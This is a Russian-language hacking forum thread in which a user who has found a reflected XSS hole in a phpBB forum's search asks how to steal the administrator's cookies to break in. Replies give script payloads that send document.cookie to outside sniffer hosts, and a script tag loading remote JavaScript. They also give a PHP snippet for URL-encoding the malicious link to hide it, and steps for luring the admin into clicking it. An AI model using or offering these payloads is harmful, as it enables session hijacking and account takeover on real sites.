Здрасте Извините если ни там запостил тему,,,,нужна помошь ачатовцев Вобщем есть сайт, там поиск, там есть XSS (активная вроде)) вобщем если в поиске ввести "><script>alert('antichat.ru')</script> и нажать НАЙТИ,,,,то вылезает окошко с надписью античат... (тестировал в опере и осле 7) Теперь вопрос: Как получить куки пользователей если ксс в поиске Это вообще реально ? Спасибо
Тоесть если я напишу админу письмо: Привет у тебя поиск не работает ( = Он зайдет в поиск...и как мне его куки своровать ? Я толко этого не пойму...
Суй в линк снифер, шифруй, и суй линк зверю которого хочешь поиметь, смотри снифер, ставь куки, властвуй.
k0lbasa Да я эту тему наизусть тебе могу рассказать ( = Тоесть если у меня будет сайт: мой_сайт.ру/xss.htm в xss.htm код HTML: '><script>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;</script> Я кидаю ссылку админу в ЛС тип зайди на этот сайт....он заходит и его куки у меня Разве такое сработает ?
Ссылку ядовитую надо ему подсунуть где в урле чето типа того "><script scr=http://xxx.ru/script.js></script> где script.js шлет куки на снифер
Тоесть Xss, которую я в поиске нашёл...она вообще не нужна ? Если что-то в поиске искать, выводится так: www.site.com/ssearch.php?q=antichat.ru
Когда чеовек получает сообщение с такой ссылкой,,,,вот что появляется Code: http://www.google.ru/search?q=%22%3E%3Cscript%20src=http://xxx.ru/script.js%3E%3C/script%3E
убрал... ------------------------------------------------------------------------------------------------------------------ Я просканил этот сайт спайдером...вот он мне выдал Когда подставляю эти значения (в опере) и захожу на сайт....ни чего нет, я не авторизирован// Это форум phpBB 2.0.17,,,,только не посылайте в тему phpBB ни один эксплойт не работает и ксс тоже в сообщениях не пашет...вот только в поиске и работает З.Ы. там где точки я затёр пару символов))))
1) Залей скрипт, ворующий куки. 2) Потом закодируй УРЛ ?search="><script scr=http://xxx.ru/script.js></script> например вот так: PHP: <TEXTAREA width=1000 height=1000> <? $st = $_GET["a"]; for ($i=0;$i<strlen($st);$i++){ $ch = substr($st,$i,1); echo "%".dechex(ord($ch)); } ?> </TEXTAREA> 3) Отсылай ссылку одмину
diehard ОГРОМНОЕ спасибо за помошь... Но я не совсем понял....я на ВЫ с PHP.... 1) Скрипт лежит на сайте www.xxx.ru/js.js 2) Code: http://site.ru/forum/ssearch.php?search="><script scr=http://xxx.ru/js.js></script> (ssearch.php всё правильно, там 2 s) Вот тут не совсем понял....как закодировать ??? URL Encode ??? ---------------------------------------------------------------------- Что это за код и куда его "пихать" PHP: <TEXTAREA width=1000 height=1000> <? $st = $_GET["a"]; for ($i=0;$i<strlen($st);$i++){ $ch = substr($st,$i,1); echo "%".dechex(ord($ch)); } ?> </TEXTAREA> Ещё раз извините за возможно идиотские вопросы....прошу, только ответте
Этот код сохрани в 1.php и запусти под сервером, хоть на локалхосте: http://localhost/1.php?a=search="><script scr=http://xxx.ru/js.js></script> В результате получится УРЛ вроде: Code: http://site.ru/forum/ssearch.php?%73%65%61%72%63%68%3d%22%3e%3c%73%63%72%69%70%74%20%73%63%72%3d%68%74%74%70%3a%2f%2f%78%78%78%2e%72%75%2f%6a%73%2e%6a%73%3e%3c%2f%73%63%72%69%70%74%3e
Выходит вот что... Code: http://localhost/1.php?a=search=%22%3E%3Cscript%20scr=http://САЙТ.ru/js.js%3E%3C/script%3E Теперь нужно это подставлять к поиску на site.ru (который хочу взломать) или что-то опять не так делаю ???
